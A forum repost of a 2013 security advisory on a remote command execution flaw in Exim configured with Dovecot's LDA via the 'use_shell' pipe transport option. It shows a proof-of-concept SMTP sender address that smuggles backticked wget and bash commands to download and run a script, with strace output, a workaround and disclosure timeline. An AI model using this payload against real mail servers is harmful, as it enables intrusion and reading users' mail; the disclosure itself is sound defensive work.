ciulama Posted May 8, 2013 Report Posted May 8, 2013 Advisory: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command ExecutionDuring a penetration test a typical misconfiguration was found in theway Dovecot is used as a local delivery agent by Exim. A common usecase for the Dovecot IMAP and POP3 server is the use of Dovecot as alocal delivery agent for Exim. The Dovecot documentation contains an exampleusing a dangerous configuration option for Exim, which leads to a remotecommand execution vulnerability in Exim.Details=======Product: Exim with Dovecot LDA and Common Example DocumentationAffected Versions: Example Configuration in Dovecot Wiki since 2009-10-23Vulnerability Type: Remote Code ExecutionSecurity Risk: HIGHVendor URL: http://www.exim.org http://www.dovecot.orgVendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-001Advisory Status: publicIntroduction============Dovecot is an open source IMAP and POP3 server. Dovecot is used both forsmall and large installations because of its good performance and simpleadministration. Exim is a message transfer agent developed at theUniversity of Cambridge, freely available under the terms of the GNUGeneral Public Licence. Both services are commonly used in tandem witheach other. Dovecot is often configured in Exim to handle mail delivery tomailboxes.The Dovecot wiki contains an example configuration for Exim to haveDovecot handle mail delivery in conjunction with LDAP. Using Dovecot asa local delivery agent (LDA) for Exim is a common use case for anExim/Dovecot server. The Dovecot wiki, which is also packaged asdocumentation with the Dovecot source packages and many Linuxdistribution packages, contains example configurations for Exim. Oneconfiguration contains a dangerous option, which leads to a remotecommand execution vulnerability in Exim. Since this configurationconcerns a very common use case of Dovecot with Exim and is widelyrepackaged in distribution packages, users of Dovecot and Exim shouldcheck their current configuration of Exim.More Details============Dovecot and Exim can be used together without any further configurationof the Exim mail delivery process. This will result in a configuration,where Dovecot can access mails delivered to a mailbox of a user, butmessage filtering through the Dovecot server-side filters is notpossible.In order for server-side mail filtering by the Sieve implementation ofDovecot to work, Dovecot provides its own local delivery agent (LDA).This agent must be added to the Exim delivery configuration as a mailtransport. To make such a configuration work, Exim offers thepossibility to use pipe transports[1]. The Exim daemon then hands theemail messages over to an external program, in this case the Dovecot LDA(on Debian GNU/Linux found at /usr/lib/dovecot/deliver).The Dovecot-Wiki[2] and documentation propose, among others, aconfiguration for using Exim with the Dovecot LDA and multiple UIDswhich are loaded from an external source, for example LDAP. It isassumed that this configuration is often used as a template whenconfiguring new email servers, as coupling SMTP and POP3/IMAP serverswith an external user database like LDAP is common. Furthermore, thisexample configuration is rather detailed. Therefore, it is estimatedthat many administrators based their configuration on this one.The example transport configuration from the Dovecot wiki is shownbelow:------------------------------------------------------------------------dovecot_deliver: debug_print = "T: Dovecot_deliver for $local_part@$domain" driver = pipe # Uncomment the following line and comment the one after it if you # want deliver to try to deliver subaddresses into INBOX.{subaddress}. # If you do this, uncomment the local_part_suffix* lines in the router # as well. Make sure you also change the separator to suit your local # setup. #command = /usr/lib/dovecot/deliver -e -k -s \ # -m "INBOX|${substr_1:$local_part_suffix}" \ command = /usr/lib/dovecot/deliver -e -k -s \ -f "$sender_address" -a "$original_local_part@$original_domain" use_shell environment = USER=$local_part@$domain umask = 002 message_prefix = message_suffix = delivery_date_add envelope_to_add return_path_add log_output log_defer_output return_fail_output freeze_exec_fail #temp_errors = * temp_errors = 64 : 69 : 70 : 71 : 72 : 73 : 74 : 75 : 78------------------------------------------------------------------------With the "use_shell" option, Exim is instructed not to start the programdirectly, but rather expand all Exim variables and pass this string to ashell afterwards, which then starts the LDA. The content of the variable$sender_address can in most standard setups be controlled by anattacker, its value is inserted verbatim into the string which issupplied to the shell. This enables attackers to execute arbitrary shellcommands in the name of the Exim system user.The following conversation with the mail server demonstrates downloadingand executing a shell script. Since spaces are not accepted within asender email address, ${IFS} can be used instead.------------------------------------------------------------------------220 host ESMTP Exim 4.72 Mon, 22 Apr 2013 13:22:23 +0200EHLO example.com250-host Hello localhost [127.0.0.1]250-SIZE 52428800250-PIPELINING250 HELPMAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com250 OKRCPT TO: someuser@example.com250 AcceptedDATA354 Enter message, ending with "." on a line by itselfSubject: test.250 OK id=1UUEqF-0004P8-2B------------------------------------------------------------------------Attaching and following the Exim process with strace during this exampleconversation results in the following strace output:------------------------------------------------------------------------# strace -p $(pgrep Exim4) -s100 -f -q -e execve[pid 16962] execve("/usr/sbin/Exim4", ["/usr/sbin/Exim4", "-Mc", "1UUEwf-0004PZ-9n"], [/* 26 vars */]) = 0[pid 16964] execve("/bin/sh", ["/bin/sh", "-c", "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${I"...], [/* 14 vars */]) = 0[pid 16966] execve("/usr/bin/wget", ["wget", "-O", "/tmp/p", "example.com/test.sh"], [/* 14 vars */]) = 0[pid 16964] --- SIGCHLD (Child exited) @ 0 (0) ---[pid 16967] execve("/bin/bash", ["bash", "/tmp/p"], [/* 14 vars */]) = 0[pid 16964] --- SIGCHLD (Child exited) @ 0 (0) ---[pid 16968] execve("/usr/lib/Dovecot/deliver", ["/usr/lib/Dovecot/deliver", "-e", "-k", "-s", "-f", "redteam@example.com", "-a", "someuser@example.com"], [/* 14 vars */]) = 0------------------------------------------------------------------------This shows that remote command execution is possible in thisconfiguration.In order to reproduce this vulnerability it is sufficient to installExim and Dovecot, then configure the Dovecot LDA as a pipe transport inExim as described by the Dovecot wiki.This example configuration was added to the Dovecot wiki in 2009 and islikely to be used in numerous Exim/Dovecot installations[3]. The Dovecotwiki is also contained within the Dovecot source files. The dangerousconfiguration suggesting the "use_shell" option mentioned in the filedoc/wiki/LDA.Exim.txt.An example for the widespread use of this configuration example is theDebian package "dovecot-common" where this example configuration isfound in the file /usr/share/doc/dovecot-common/wiki/LDA.Exim.txt.gz[4].While the redistribution in Debian was verified, it is very likely thatother distributions also contain this vulnerable configuration example.Proof of Concept================Sender address which tricks the mail server to download and execute ashell script on delivery:------------------------------------------------------------------------red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com------------------------------------------------------------------------Workaround==========Users who use Exim in tandem with Dovecot LDA should check their Eximtransport configuration for the "use_shell" option. In theconfiguration example the "use_shell" option is not necessary and shouldbe removed. In this case the mail server directly starts the LDAwithout a shell, as the following output of strace during a deliveryshows:------------------------------------------------------------------------[pid 17485] execve("/usr/sbin/exim4", ["/usr/sbin/exim4", "-Mc", "1UUFGk-0004Y0-Rb"], [/* 14 vars */]) = 0[pid 17487] execve("/usr/lib/dovecot/deliver", ["/usr/lib/dovecot/deliver", "-e", "-k", "-s", "-f", "red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com", "-a", "someuser@example.com"], [/* 14 vars */]) = 0------------------------------------------------------------------------As shown the sender address string is directly passed to the LDA, andnot expanded by a shell.Fix===Administrators should check their configuration as described under"Workaround".The dangerous option "use_shell" should be removed from the Dovecot wikiand all the source packages. Also, all distribution packages of Dovecotthat contain this example configuration should be changed to preventusers from introducing a remote command execution vulnerability in theirExim/Dovecot installation.Security Risk=============The documentation on a configuration example for a common use case ofDovecot as a local delivery agent for the Exim mail server contains aconfiguration option which leads to a remote command execution.Attackers can execute arbitrary shell commands as the user the Exim mailserver runs as. It is estimated that many administrators based theirExim configuration on this example. The resulting vulnerability may beused to establish a foothold on a mail server, read users' mails orexpand access rights via a local exploit. Since this configurationexample is redistributed with Dovecot packages and describes a commonuse case for Dovecot and Exim, this configuration is considered to be ahigh risk.History=======2013-03-05 Vulnerability identified2013-05-02 Vendor notified2013-05-02 Vendor confirmed the vulnerability2013-05-02 Vendor removed the offending line from the Dovecot wiki2013-05-03 Advisory releasedReferences==========[1] http://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_pipe_transport.html[2] http://wiki.dovecot.org/LDA/Exim[3] http://wiki.dovecot.org/LDA/Exim?action=diff&rev2=12&rev1=11[4] http://packages.debian.org/search?keywords=dovecot-commonRedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttps://www.redteam-pentesting.de.--RedTeam Pentesting GmbH Tel.: +49 241 510081-0Dennewartstr. 25-27 Fax : +49 241 510081-9952068 Aachen https://www.redteam-pentesting.deGermany Registergericht: Aachen HRB 14004Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbecksursa: Dovecot with Exim sender_address Parameter - Remote Command Execution Quote